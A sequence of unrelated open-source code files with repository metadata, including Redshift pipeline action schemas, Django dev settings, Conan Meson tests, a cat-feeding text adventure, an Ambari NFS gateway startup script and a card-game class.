description='Executes a user defined SQL script',
params_json_schema={
'type': 'object',
'properties': {
'sql_script': {
'type': 'string',
'x-schema-form': {'type': 'textarea'},
'description': 'The SQL script to be executed'
},
},
'additionalProperties': False,
'required': ['sql_script'],
},
)
load_dataset = ActionType(
name='load_dataset',
description='Copies the dataset from s3 to the datastore',
params_json_schema={
'type': 'object',
'properties': {
'dataset_id': {'type': 'string', 'description': 'The id of the dataset to load'},
's3_path_start_prefix_inclusive_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
's3_path_start_prefix_inclusive': {
'type': ['string', 'null'],
'default': None,
'pattern': '^s3://.+$',
'description': 'The inclusive s3 path start prefix. The following values (with braces) will be '
'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
'{DAY}, {HOUR}, {MINUTE}, {SECOND}',
},
's3_path_end_prefix_exclusive_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
's3_path_end_prefix_exclusive': {
'type': ['string', 'null'],
'default': None,
'pattern': '^s3://.+$',
'description': 'The exclusive s3 path end prefix. The following values (with braces) will be '
'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
'{DAY}, {HOUR}, {MINUTE}, {SECOND}',
},
's3_path_regex_filter_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
's3_path_regex_filter': {
'type': ['string', 'null'],
'default': None,
'description': 'A regex pattern the s3 path must match. The following values (with braces) will be '
'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
'{DAY}, {HOUR}, {MINUTE}, {SECOND}',
},
'target_schema_name': {'type': ['string', 'null'], 'default': 'public', 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'created if absent'},
'target_table_name': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
'target_sort_keys': {
'type': 'array',
'default': [],
'maxItems': 400,
'description': 'overrides dataset setting',
'x-schema-form': {'type': 'tabarray', 'title': "{{ value || 'sort_key ' + $index }}"},
'items': {'type': 'string', 'pattern': '^[a-zA-Z0-9_]+$', 'maxLength': 127}
},
'target_distribution_key': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
'distribution_style': {'type': 'string', 'default': 'EVEN', 'enum': ['EVEN', 'ALL'], 'description': 'ignored if dist_key is chosen'},
'sort_keys_interleaved': {'type': ['boolean', 'null'], 'default': False, 'description': 'see AWS Redshift docs'},
'truncate_columns': {'type': ['boolean', 'null'], 'default': True},
'max_errors': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
'batch_size': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
},
'additionalProperties': False,
'required': ['dataset_id'],
}
)
consume_subscription = ActionType(
name='consume_subscription',
description='Consumes the next available dataset subscription elements',
params_json_schema={
'type': 'object',
'properties': {
'subscription_id': {'type': 'string', 'description': 'The id of the subscription to consume'},
'target_schema_name': {'type': ['string', 'null'], 'default': 'public', 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'created if absent'},
'target_table_name': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
'target_sort_keys': {
'type': 'array',
'default': [],
'maxItems': 400,
'description': 'overrides dataset setting',
'x-schema-form': {'type': 'tabarray', 'title': "{{ value || 'sort_key ' + $index }}"},
'items': {'type': 'string', 'pattern': '^[a-zA-Z0-9_]+$', 'maxLength': 127}
},
'target_distribution_key': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
'distribution_style': {'type': 'string', 'default': 'EVEN', 'enum': ['EVEN', 'ALL'], 'description': 'ignored if dist_key is chosen'},
'sort_keys_interleaved': {'type': ['boolean', 'null'], 'default': False, 'description': 'see AWS Redshift docs'},
'truncate_columns': {'type': ['boolean', 'null'], 'default': True},
'max_errors': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
'batch_size': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
},
'additionalProperties': False,
'required': ['subscription_id'],
}
)
copy_to_s3 = ActionType(
name='copy_to_s3',
description='exports the results of a sql statement to s3',
params_json_schema={
'type': 'object',
'properties': {
'delimiter': {'type': ['string', 'null'], 'default': '\t', 'description': 'field delimiter'},
'source_sql_statement': {
'type': 'string',
"x-schema-form": {"type": "textarea"},
'description': 'the SQL SELECT statement to be executed'
},
'destination_s3_path': {
'type': 'string',
'pattern': '^s3://.+$',
'description': 'The destination s3 path, e.g. s3://bucket/prefix. The following values (with braces)'
' will be substituted with the appropriate zero-padded values at runtime:'
'{YEAR}, {MONTH}, {DAY}, {HOUR}, {MINUTE}, {SECOND}'
},
'parallel': {'type': 'boolean', 'default': True, 'description': 'if false, unload sequentially as one file'},
},
'additionalProperties': False,
'required': ['source_sql_statement', 'destination_s3_path'],
},
)
data_check = ActionType(
name='data_check',
description='Executes a user defined, SQL data check',
params_json_schema={
'type': 'object',
'properties': {
'sql_script': {
'type': 'string',
'x-schema-form': {'type': 'textarea'},
'description': 'this SQL should return one row that is true (for "passed") or false (for "failed")'
},
},
'additionalProperties': False,
'required': ['sql_script'],
},
)
cluster_maintenance = ActionType(
name='cluster_maintenance',
description='Maintains data retention policies, Vacuum/Analyzes tables, and ensures advantageous encoding',
params_json_schema={
'type':'object',
'properties':{
'Retention_Policy': {'type': 'boolean', 'default': True,
'description': 'If True, will use dart.retention_policy table to clean out data older than the number of days listed'},
'Vacuum': {'type': 'boolean', 'default': True,
'description': 'If True, will run Vacuum post load. Recommended True'},
'Analyze': {'type': 'boolean', 'default': True,
'description': 'If True, will run Analyze post load. Recommended True'},
},
'additionalProperties': False,
'required': ['Retention_Policy'],
},
)
| {
"content_hash": "32f150405f21a6781f40662264445760",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 220,
"avg_line_length": 55.1968085106383,
"alnum_prop": 0.49898814686325527,
"repo_name": "RetailMeNotSandbox/dart",
"id": "49747b8f010884e56df406f044aa549506c684c7",
"size": "10377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/dart/engine/redshift/metadata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "103727"
},
{
"name": "HTML",
"bytes": "67636"
},
{
"name": "JavaScript",
"bytes": "2762304"
},
{
"name": "Nginx",
"bytes": "996"
},
{
"name": "PLpgSQL",
"bytes": "1475"
},
{
"name": "Python",
"bytes": "1025954"
},
{
"name": "Ruby",
"bytes": "5523"
},
{
"name": "Shell",
"bytes": "3100"
}
],
"symlink_target": ""
} |
"""
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = get_config("DEBUG")
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = get_config("DJANGO_KEY")
# EMAIL
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("anymail",)
# Output emails to stdout
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware',]
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# tricks to have debug toolbar when developing with docker
if os.environ.get('USE_DOCKER') == 'yes':
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions',)
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
| {
"content_hash": "723b876348a41dc270adc89dd8183989",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 80,
"avg_line_length": 29.279411764705884,
"alnum_prop": 0.49472626820693116,
"repo_name": "TexasLAN/texaslan.org",
"id": "60ce193ca5eb834de4c41c2a50eb22ecac6b9322",
"size": "2015",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config/settings/local.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "242691"
},
{
"name": "Dockerfile",
"bytes": "576"
},
{
"name": "HTML",
"bytes": "116042"
},
{
"name": "JavaScript",
"bytes": "50779"
},
{
"name": "Python",
"bytes": "165928"
},
{
"name": "Shell",
"bytes": "4612"
}
],
"symlink_target": ""
} |
import os
import re
import sys
import pytest
from conans.model.ref import ConanFileReference, PackageReference
from conans.test.utils.tools import TestClient
@pytest.mark.tool_meson
@pytest.mark.skipif(sys.version_info.major == 2, reason="Meson not supported in Py2")
@pytest.mark.tool_pkg_config
def test_meson_lib_template():
# Identical to def test_cmake_lib_template(), but for Meson
client = TestClient(path_with_spaces=False)
client.run("new hello/0.1 --template=meson_lib")
# Local flow works
client.run("install . -if=install")
client.run("build . -if=install")
client.run("export-pkg . hello/0.1@ -if=install")
package_id = re.search(r"Packaging to (\S+)", str(client.out)).group(1)
pref = PackageReference(ConanFileReference.loads("hello/0.1"), package_id)
package_folder = client.cache.package_layout(pref.ref).package(pref)
assert os.path.exists(os.path.join(package_folder, "include", "hello.h"))
# Create works
client.run("create .")
assert "hello/0.1: Hello World Release!" in client.out
client.run("create . -s build_type=Debug")
assert "hello/0.1: Hello World Debug!" in client.out
# Create + shared works
client.run("create . -o hello:shared=True")
assert "hello/0.1: Hello World Release!" in client.out
@pytest.mark.tool_meson
@pytest.mark.skipif(sys.version_info.major == 2, reason="Meson not supported in Py2")
def test_meson_exe_template():
client = TestClient(path_with_spaces=False)
client.run("new greet/0.1 --template=meson_exe")
# Local flow works
client.run("install . -if=install")
client.run("build . -if=install")
# Create works
client.run("create .")
assert "greet/0.1: Hello World Release!" in client.out
client.run("create . -s build_type=Debug")
assert "greet/0.1: Hello World Debug!" in client.out
| {
"content_hash": "c93fecea30baa38e2bfdec3c4902b0bb",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 85,
"avg_line_length": 34.48148148148148,
"alnum_prop": 0.6928034371643395,
"repo_name": "conan-io/conan",
"id": "e182af683e72284e767eaaaef21fa51f89c883bd",
"size": "1862",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "conans/test/functional/toolchains/meson/test_v2_meson_template.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "264"
},
{
"name": "C++",
"bytes": "425"
},
{
"name": "CMake",
"bytes": "447"
},
{
"name": "Python",
"bytes": "8209945"
}
],
"symlink_target": ""
} |
from suit import *
class Card(object):
value_to_index = {}
for card_value in range(2, 10):
value_to_index[str(card_value)] = card_value - 2
value_to_index['T'] = 8
value_to_index['J'] = 9
value_to_index['Q'] = 10
value_to_index['K'] = 11
value_to_index['A'] = 12
index_to_value = dict([(index, value) for value, index in value_to_index.items()])
@classmethod
def index_for_card(cls, value_char):
return cls.value_to_index[str(value_char)]
@classmethod
def card_for_index(cls, index):
return cls.index_to_value[index]
@classmethod
def identifier_for_card(cls, suit, value):
return suit.index * 13 + cls.index_for_card(value)
@classmethod
def suit_and_index_from_identifier(cls, identifier):
suit_index = identifier / 13
card_index = identifier - suit_index * 13
return (Suit.from_index(suit_index), card_index)
@classmethod
def suit_and_value_from_identifier(cls, identifier):
suit, index = cls.suit_and_index_from_identifier(identifier)
return suit, cls.card_for_index(index)
@classmethod
def card_name(cls, suit, value_char):
return "%s of %s" % (value_char, suit.name)
@classmethod
def high_card_points(self, value_char):
return {'J': 1, 'Q': 2, 'K': 3, 'A': 4}.get(value_char, 0)
@classmethod
def control_count(self, value_char):
return {'K': 1, 'A': 2}.get(value_char, 0)
def __init__(self, suit, value_char):
self.suit = suit
assert suit in SUITS
self.value_char = value_char
assert value_char in ('A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3', '2')
def display_value(self):
if self.value_char == 'T':
return '10'
return self.value_char
@property
def name(self):
return "%s%s" % (self.display_value(), self.suit.char)
def index(self):
return self.index_for_card(self.value_char)
| {
"content_hash": "f4eab0ede7d59af18c42c0913f24a4ae",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 94,
"avg_line_length": 29.426470588235293,
"alnum_prop": 0.5872063968015993,
"repo_name": "abortz/saycbridge",
"id": "2bc37d383a311c0c50ca8ce6c6a0142fb5bf3ebb",
"size": "2170",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/core/card.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "9098"
},
{
"name": "CoffeeScript",
"bytes": "164705"
},
{
"name": "Dart",
"bytes": "5888"
},
{
"name": "HTML",
"bytes": "6694257"
},
{
"name": "Java",
"bytes": "2633"
},
{
"name": "Makefile",
"bytes": "1913"
},
{
"name": "Objective-C",
"bytes": "17656"
},
{
"name": "Python",
"bytes": "435099"
},
{
"name": "Shell",
"bytes": "1937"
}
],
"symlink_target": ""
} |
from sys import exit
def start():
print """
You are violently woken by what feels like a punch to your gut,
but is actually a massive grey cat jumping onto your stomach.
He settles on your chest, his enormous weight shoving the air out
of your lungs. He folds his little grey paws under him and peers
intensely into your sleepy, half-opened eyes. He licks his lips,
a look of indignant expectation on his face. It's pretty clear
that he wants you to wake up and feed him.
Will you wake up, or sleep?"""
enter = raw_input("> ")
if "wake" in enter:
hallway()
elif "sleep" in enter:
badend("""
The boss cat calmly settles down on top of your windpipe. He ignores
your struggles and smirks as your life is slowly extinguished.""")
else:
print """
I don't know what '%s' means. Try \"wake up\" or \"sleep\".
""" % enter
start()
def hallway():
print """
You pull yourself out of the extremely comfortable bed and stumble
blearily into the hallway. The grey cat eagerly leaps after you and
meows expectantly. Just as you are about to turn the kitchen door
handle, a streak of black comes hurtling towards your legs.
What will you do?"""
enter = raw_input("> ")
if "dodge" in enter:
kitchen()
elif "kick" in enter:
badend("""
You instinctively kick out. Your foot connects with a tiny, yowling
black cat. Enraged at being kicked, the black cat claws its way up
your leg. You see a flash of bright white teeth before your face is
forcibly removed from your skull.""")
else:
badend("""
The black blur turns out to be another cat, who knocks into your legs
and sends you flying. You catch a glimpse of the two cats doing epic
battle just before you pass out.""")
def kitchen():
print """
You quickly dodge out of the way while the black streak collides
heavily into the wall. It turns out to be yet another cat, hungry for
breakfast and maybe your blood. You throw open the door to the
kitchen the exact instant the two cats hurl themselves at you."""
forkintheroad()
def forkintheroad():
print """
To your left is a living room with a big squashy couch and an HDTV.
To the right is your office, which is doubling as the cats' room.
It's a hollowed-out, desolate wasteland filled with shredded cat toys
and tumble weeds made of cat hair. You can see a crate of cat food
near what was once your desk, but is now a hair-covered cat palace.
Beside it are two crusty food bowls.
Will you enter the living room or the office?"""
cats_fed = False
while True:
enter = raw_input("> ")
if "office" in enter and not cats_fed:
print """
You bob and weave your way through the myriad of claws and hairballs
and pry the lid off of the food tank just as the cats engage their
SUPER HYPER BERSERKER CAT FEEDING FRENZY mode.
Will you feed the cats, or flee from the madness?"""
enter = raw_input("> ")
if "feed" in enter:
print """
You grab the two food bowls and dole out two hearty scoops of cat
food into each. The two cats weave furiously around and between your
legs, trying to get at the food. You place the bowls on the floor and
immediately withdraw your hands, lest they disappear in the ensuing
carnage. The cats, satisfied for now, settle on their haunches and
begin eating.
You make it back to the kitchen. The living room should be available
to you now that the cats are out of the way.
Will you enter the living room or go back to the office?"""
cats_fed = True
elif "flee" in enter:
badend ("""
You make a mad dash out of the office and back to the hallway. As you
make a mad dash for the exit, a cat paw snakes around your ankle and
trips you up. Two sets of gleaming, grinning teeth bob in the air
above you as your vision fades to black.""")
else:
badend ("""
The cats, sensing weakness, lunge at the lid. It falls off with a
clatter, and the feeding frenzy has begun. When you reach out to stop
the cats from licking the whole bin clean, a smart cat-punch to the
temple knocks you unconscious. You black out to the sounds of two
cats horfing down an entire month's supply of cat food.""")
elif "living" in enter and cats_fed:
livingroom()
elif "office" in enter and cats_fed == True:
badend("""
The cats hear you enter the office and, still in berserker mode due
to the feeding frenzy, mistake you for a rival come to steal their
sustenance away. Before you can raise your hands to protect yourself,
you find that your arms are weighed down on both sides by fuzzy,
adorable little creatures who wish only to murder you.""")
else:
badend("""
The cats are disappointed in you. Their cold, glacial stares seem to
bore straight into your soul, and the shrill, wavering \"FEED ME\"
yowls pierce through your skull. Before you can take another step, a
huge weight falls on your chest and knocks you on your back. Two
fuzzy snouts push their way into your field of vision just as
everything fades to black.""")
else:
badend("""
You hesitate a moment too long. The cats are not pleased with your
indecision, and take it out by lovingly smothering your breathing
holes with their squishy, fuzzy bodies.""")
def livingroom():
print """
You are finally able to sink your tired, weary body into the inviting
folds of your beloved sofa. You are able to grab the TV remote and
switch to the morning news when you suddenly year a yowl coming from
the office. The cats, left to their own primal devices, have started
fighting over the last scraps of food clinging to the bottom of their
bowls. Through the crack in the door that leads to the office you can
see what looks like a furry, dramatic reenactment of 300.
Do you watch the news, or do you check on the cats?"""
enter = raw_input("> ")
if "news" in enter:
badend("""
The floorboards beneath you jump and quiver as your office struggles
to contain the epic cat battle. You try to tune it all out and turn
up the volume on your television to max. Right when the screen
switches to the weather report, you are suddenly enveloped in an
enormous pillar of light and energy. The realization crosses your
mind that you have been caught in the crossfire of one of the cats'
Neo Armstrong Cyclone Jet Armstrong Cannon blast crosses your mind.
Nanoseconds later, both you and your apartment are evaporated.""")
elif "cats" in enter:
goodend("""
The cats immediately settle down when you stand threateningly in the
doorway of the office. You are perilously sleep-deprived. It seems
like you can physically feel the tattered remains of your sanity and
patience ebb away.
Just as you are about to finally snap, the cats calmly wind
themselves around your feet, yawn hugely, and fall asleep. The
adorable sight of two sets of tiny paws resting on your toes is
almost too much to bear.
You take in a huge breath, let it all out in one ragged sigh, and
reach down to pat these adorable little dudes. They are UNBELIEVABLY
selfish and needy, but these moments of warm fuzzy cuteness make it
all worth it... right? ....... right?!""")
else:
print """
I don't know what '%s' means. Try \"news\" or \"cats\".
""" % enter
def badend(why):
print why, "\n\n\n\t\t\tGAME OVER.\nTry again? Y/N"
enter = raw_input("> ")
if "Y" in enter:
start()
elif "y" in enter:
start()
else:
exit(0)
def goodend(why):
print why, "\n\n\n\t\t\tYOU DID IT!\n"
exit(0)
start()
| {
"content_hash": "8372efd862dafbadadd49fe5f52a327c",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 69,
"avg_line_length": 35.66990291262136,
"alnum_prop": 0.7367991290146979,
"repo_name": "redlandcannibal/morning-cats",
"id": "24958302fa046c53562f2c0c637ce7a891aab0ca",
"size": "7503",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "morning-cats.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7503"
}
],
"symlink_target": ""
} |
from telemetry.page import legacy_page_test
from telemetry.timeline import model
from telemetry.timeline import tracing_config
from telemetry.value import scalar
class DrawProperties(legacy_page_test.LegacyPageTest):
def __init__(self):
super(DrawProperties, self).__init__()
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs([
'--enable-prefer-compositing-to-lcd-text',
])
def WillNavigateToPage(self, page, tab):
del page # unused
config = tracing_config.TracingConfig()
config.chrome_trace_config.category_filter.AddDisabledByDefault(
'disabled-by-default-cc.debug.cdp-perf')
config.enable_chrome_trace = True
tab.browser.platform.tracing_controller.StartTracing(config)
def ComputeAverageOfDurations(self, timeline_model, name):
events = timeline_model.GetAllEventsOfName(name)
event_durations = [d.duration for d in events]
assert event_durations, 'Failed to find durations'
duration_sum = sum(event_durations)
duration_count = len(event_durations)
duration_avg = duration_sum / duration_count
return duration_avg
def ValidateAndMeasurePage(self, page, tab, results):
del page # unused
timeline_data = tab.browser.platform.tracing_controller.StopTracing()
timeline_model = model.TimelineModel(timeline_data)
pt_avg = self.ComputeAverageOfDurations(
timeline_model,
'LayerTreeHostCommon::ComputeVisibleRectsWithPropertyTrees')
results.AddValue(scalar.ScalarValue(
results.current_page, 'PT_avg_cost', 'ms', pt_avg,
description='Average time spent processing property trees'))
def DidRunPage(self, platform):
tracing_controller = platform.tracing_controller
if tracing_controller.is_tracing_running:
tracing_controller.StopTracing()
| {
"content_hash": "62d3e8328ce6d0d6a91e0ba8194e6e73",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 73,
"avg_line_length": 35.84313725490196,
"alnum_prop": 0.737417943107221,
"repo_name": "google-ar/WebARonARCore",
"id": "3021930188375570f71fa391bba76cfcd91b9394",
"size": "1991",
"binary": false,
"copies": "6",
"ref": "refs/heads/webarcore_57.0.2987.5",
"path": "tools/perf/measurements/draw_properties.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from resource_management.core.resources import Directory
from resource_management.core import shell
from utils import service
import subprocess,os
# NFS GATEWAY is always started by root using jsvc due to rpcbind bugs
# on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542
def prepare_rpcbind():
Logger.info("check if native nfs server is running")
p, output = shell.call("pgrep nfsd")
if p == 0 :
Logger.info("native nfs server is running. shutting it down...")
# shutdown nfs
shell.call("service nfs stop")
shell.call("service nfs-kernel-server stop")
Logger.info("check if the native nfs server is down...")
p, output = shell.call("pgrep nfsd")
if p == 0 :
raise Fail("Failed to shutdown native nfs service")
Logger.info("check if rpcbind or portmap is running")
p, output = shell.call("pgrep rpcbind")
q, output = shell.call("pgrep portmap")
if p!=0 and q!=0 :
Logger.info("no portmap or rpcbind running. starting one...")
p, output = shell.call("service rpcbind start")
q, output = shell.call("service portmap start")
if p!=0 and q!=0 :
raise Fail("Failed to start rpcbind or portmap")
Logger.info("now we are ready to start nfs gateway")
def nfsgateway(action=None, format=False):
import params
if action== "start":
prepare_rpcbind()
if action == "configure":
return
elif action == "start" or action == "stop":
service(
action=action,
name="nfs3",
user=params.root_user,
create_pid_dir=True,
create_log_dir=True
)
| {
"content_hash": "21abe1ee866570255b531d78cf5cb516",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 80,
"avg_line_length": 34.041666666666664,
"alnum_prop": 0.7205222358221134,
"repo_name": "alexryndin/ambari",
"id": "efebfc50d5f317b61dcf49c90d2c52762ea7827f",
"size": "2451",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch-adh-1.5",
"path": "ambari-server/src/main/resources/stacks/BigInsights/4.0/services/HDFS/package/scripts/hdfs_nfsgateway.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "44884"
},
{
"name": "C",
"bytes": "331204"
},
{
"name": "C#",
"bytes": "215907"
},
{
"name": "C++",
"bytes": "257"
},
{
"name": "CSS",
"bytes": "786184"
},
{
"name": "CoffeeScript",
"bytes": "8465"
},
{
"name": "FreeMarker",
"bytes": "2654"
},
{
"name": "Groovy",
"bytes": "89958"
},
{
"name": "HTML",
"bytes": "2514774"
},
{
"name": "Java",
"bytes": "29565801"
},
{
"name": "JavaScript",
"bytes": "19033151"
},
{
"name": "Makefile",
"bytes": "11111"
},
{
"name": "PHP",
"bytes": "149648"
},
{
"name": "PLpgSQL",
"bytes": "316489"
},
{
"name": "PowerShell",
"bytes": "2090340"
},
{
"name": "Python",
"bytes": "17215686"
},
{
"name": "R",
"bytes": "3943"
},
{
"name": "Roff",
"bytes": "13935"
},
{
"name": "Ruby",
"bytes": "33764"
},
{
"name": "SQLPL",
"bytes": "4277"
},
{
"name": "Shell",
"bytes": "886011"
},
{
"name": "Vim script",
"bytes": "5813"
},
{
"name": "sed",
"bytes": "2303"
}
],
"symlink_target": ""
} |
import unittest
import time
from functools import partial
import pwm.widgets
import test.util as util
class TestWidgets(unittest.TestCase):
def setUp(self):
util.setup()
def tearDown(self):
util.tear_down()
def _call_widgets(self):
widgets = [partial(pwm.widgets.time(), "%H-%M", "#ff00ff")]
pwm.widgets._call_widgets(widgets)
self.assertEqual(pwm.widgets.output,
[("#ff00ff", time.strftime("%H-%M"))])
def test_time(self):
self.assertEqual(pwm.widgets.time("%H-%M", "#ff00ff")(),
("#ff00ff", time.strftime("%H-%M")))
| {
"content_hash": "365229994c70672e46831dbac7705a7b",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 67,
"avg_line_length": 25.56,
"alnum_prop": 0.5805946791862285,
"repo_name": "mibitzi/pwm",
"id": "142dee5f57009ed6853532b5fd168b1261314115",
"size": "743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_widgets.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "265503"
},
{
"name": "Shell",
"bytes": "59"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup
version_file = os.path.abspath(os.path.join("driftconfig", "VERSION"))
with open(version_file) as f:
version = f.readlines()[0].strip()
setup(
name='python-driftconfig',
version=version,
license='MIT',
author='Directive Games',
author_email='info@directivegames.com',
description='Drift Configuration Management.',
packages=['driftconfig'],
url='https://github.com/dgnorth/drift-config',
include_package_data=True,
python_requires=">=3.6",
# the conditional on i.req avoids the error:
# distutils.errors.DistutilsError: Could not find suitable distribution for Requirement.parse('None')
install_requires=[
'click',
'jsonschema',
'jinja2',
'six',
'cachetools',
],
extras_require={
's3-backend': [
'boto3',
],
'redis-backend': [
'redis',
],
'trigger': [
'boto3',
'redis',
'zappa',
],
'test': [
'pytest>=5.0',
'pytest-cov',
]
},
entry_points='''
[console_scripts]
driftconfig=driftconfig.cli:main
dconf=driftconfig.cli:cli
''',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Flask',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| {
"content_hash": "8d55daae5eeb39a5d1b880871ac6ea86",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 105,
"avg_line_length": 29.166666666666668,
"alnum_prop": 0.5395238095238095,
"repo_name": "dgnorth/drift-config",
"id": "b29a881bdd4592edbc2802f6e9f6c9d53a9685a7",
"size": "2100",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1592"
},
{
"name": "Python",
"bytes": "237551"
},
{
"name": "Shell",
"bytes": "805"
}
],
"symlink_target": ""
} |
from csrv.model import modifiers
from csrv.model.cards import card_info
from csrv.model.cards import upgrade
class Card01079(upgrade.Upgrade):
NAME = u'Card01079'
SET = card_info.CORE
NUMBER = 79
SIDE = card_info.CORP
FACTION = card_info.NETCORP
INFLUENCE = 2
UNIQUE = True
KEYWORDS = set([
card_info.SYSOP,
card_info.UNORTHODOX,
])
COST = 1
IMAGE_SRC = '01079.png'
TRASH_COST = 3
def __init__(self, game, player):
upgrade.Upgrade.__init__(self, game, player)
self.modifier = None
def build_actions(self):
upgrade.Upgrade.build_actions(self)
def on_rez(self):
upgrade.Upgrade.on_rez(self)
self.modifier = modifiers.IceRezCostModifier(
self.game, -2, server=self.location.parent)
def on_derez(self):
if self.modifier:
self.modifier.remove()
self.modifier = None
| {
"content_hash": "817127d0de973cc7db0d53aa41dd27e7",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 51,
"avg_line_length": 22.526315789473685,
"alnum_prop": 0.6705607476635514,
"repo_name": "mrroach/CentralServer",
"id": "711c73a90bc850eb7f043a2f54184e64785240df",
"size": "856",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "csrv/model/cards/corp/card01079.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "23340"
},
{
"name": "JavaScript",
"bytes": "133607"
},
{
"name": "Python",
"bytes": "433045"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
from util.tipo import tipo
class S_USER_LEVELUP(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
| {
"content_hash": "4f5f62ad47b32ac3251cadab7770fc9f",
"timestamp": "",
"source": "github",
